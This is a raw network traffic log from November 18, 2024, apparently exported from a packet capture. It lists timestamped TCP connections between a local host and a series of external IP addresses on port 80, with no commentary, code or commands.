                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:41.404783964 CET805003318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:41.404802084 CET805003318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:42.852495909 CET805003318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:42.855587959 CET5003380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:42.861116886 CET805003318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:42.861183882 CET5003380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.000910997 CET5003480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.006297112 CET805003418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.006367922 CET5003480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.006525040 CET5003480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.006525040 CET5003480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.011651993 CET805003418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.011670113 CET805003418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.837762117 CET805003418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.839061022 CET5003480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.845442057 CET805003418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.845633984 CET5003480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.983778954 CET5003580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.988780975 CET805003518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.988848925 CET5003580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.989088058 CET5003580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.989120007 CET5003580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.993946075 CET805003518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.993963003 CET805003518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.656181097 CET805003518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.658117056 CET5003580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.663336992 CET805003518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.665505886 CET5003580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.988336086 CET5003680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.993360996 CET805003613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.993447065 CET5003680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.993643045 CET5003680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.993643045 CET5003680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.998622894 CET805003613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.057987928 CET80500433.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.058059931 CET80500433.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.726326942 CET80500433.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.726629972 CET5004380192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.731946945 CET80500433.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.732233047 CET5004380192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.983468056 CET5004480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.988317013 CET805004418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.988389015 CET5004480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.988648891 CET5004480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.988667011 CET5004480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.993587971 CET805004418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.993599892 CET805004418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.175517082 CET805003882.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.175597906 CET5003880192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.201703072 CET5003880192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.206623077 CET805003882.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.212791920 CET5004580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.217808962 CET805004547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.217890024 CET5004580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.217983007 CET5004580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.218007088 CET5004580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.222842932 CET805004547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.223092079 CET805004547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.823385000 CET805004418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.823781013 CET5004480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.829471111 CET805004418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.830482960 CET5004480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.039758921 CET5004680192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.045439959 CET80500463.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.045533895 CET5004680192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.045732975 CET5004680192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.045758963 CET5004680192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.051078081 CET80500463.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.051090002 CET80500463.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.715383053 CET805004547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.715677023 CET5004580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.721420050 CET805004547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.721499920 CET5004580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.734328985 CET5004780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.739386082 CET805004713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.739455938 CET5004780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.740025997 CET5004780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.740039110 CET5004780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.744894981 CET805004713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.744911909 CET805004713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.013690948 CET80500463.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.015916109 CET5004680192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.021248102 CET80500463.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.021311045 CET5004680192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.351972103 CET5004880192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.357001066 CET805004885.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.357319117 CET5004880192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.360749006 CET5004880192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.361597061 CET5004880192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.365602970 CET805004885.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.392328978 CET5005580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.392772913 CET5005580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.392791033 CET5005580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.397655964 CET805005547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.397667885 CET805005547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.748811960 CET8050054172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.748894930 CET5005480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.749269009 CET5005480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.754070997 CET8050054172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.763346910 CET5005680192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.768277884 CET805005634.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.769537926 CET5005680192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.769539118 CET5005680192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.769539118 CET5005680192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.774483919 CET805005634.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.774507046 CET805005634.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.732074976 CET805005634.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.777843952 CET5005680192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.860630035 CET805005547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.902582884 CET5005580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.905288935 CET5005680192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.906243086 CET5005580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.911072969 CET805005634.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.911145926 CET5005680192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.911611080 CET805005547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.911662102 CET5005580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.129748106 CET5005780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.134933949 CET805005718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.135345936 CET5005780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.135345936 CET5005780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.135529041 CET5005780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.140644073 CET805005718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.140700102 CET805005718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.516810894 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.516875982 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.519989014 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.521467924 CET5005880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.525454044 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.527065039 CET805005818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.527190924 CET5005880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.527333975 CET5005880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.527333975 CET5005880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.532764912 CET805005818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.532776117 CET805005818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.826997042 CET805005718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.827183962 CET5005780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.832900047 CET805005718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.833045006 CET5005780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.179490089 CET805005818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.179805994 CET5005880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.184926987 CET805005818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.185039997 CET5005880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.196249962 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.201153994 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.201234102 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.079329967 CET5006680192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.095609903 CET5006680192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.095609903 CET5006680192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.100675106 CET805006635.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.100714922 CET805006635.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.911253929 CET805006518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.915406942 CET805006635.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.933975935 CET5006580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.934187889 CET5006680192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.939429998 CET805006518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.939554930 CET5006580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.939784050 CET805006635.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.940135002 CET5006680192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.945691109 CET5006780192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.950958967 CET80500673.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.951029062 CET5006780192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.969805002 CET5006780192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.969827890 CET5006780192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.976205111 CET80500673.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.976495981 CET80500673.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.605551004 CET80500673.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.605809927 CET5006780192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.611099958 CET80500673.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.611157894 CET5006780192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.617548943 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.622492075 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.622592926 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.622685909 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.622700930 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.627826929 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.627847910 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.639834881 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.645534992 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.645828962 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.647481918 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.647644997 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.652479887 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.652602911 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.355098009 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.358951092 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.358983040 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.364253044 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.364360094 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.536428928 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.590065002 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.090563059 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.142589092 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.216495037 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.221997976 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.222105980 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.408133030 CET5007080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.413156033 CET805007054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.413266897 CET5007080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.413577080 CET5007080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.413577080 CET5007080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.418497086 CET805007054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.323368073 CET805007618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.360620022 CET805007544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.360815048 CET5007580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.366103888 CET805007544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.366177082 CET5007580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.731337070 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.736442089 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.736629009 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.736795902 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.737037897 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.741636992 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.741883993 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.829994917 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.830157042 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.830166101 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.830176115 CET805007618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.830212116 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.830358028 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.831026077 CET5007680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110440016 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110455990 CET805007618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110491991 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110512972 CET5007680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110950947 CET805007754.244.188.177192.168.2.10
